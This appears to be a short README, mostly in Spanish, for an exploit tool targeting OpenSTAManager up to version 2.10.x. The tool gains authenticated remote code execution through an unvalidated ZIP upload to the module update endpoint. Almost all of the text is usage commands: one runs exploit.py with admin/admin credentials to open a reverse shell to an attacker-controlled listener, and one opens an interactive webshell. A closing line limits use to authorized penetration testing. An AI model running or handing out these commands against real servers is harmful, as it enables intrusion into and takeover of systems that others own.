
RCE autenticado mediante carga de ZIP sin validar en el endpoint de actualización de módulos.
Afectado: OpenSTAManager <= 2.10.x
pip install requests
# Reverse shell (Penelope or any listener)
python3 exploit.py -u http://TARGET -U admin -P admin --lhost 10.10.14.X --lport 4444
# Interactive webshell
python3 exploit.py -u http://TARGET -U admin -P admin --interactive
Solo para pruebas de penetración autorizadas y fines educativos.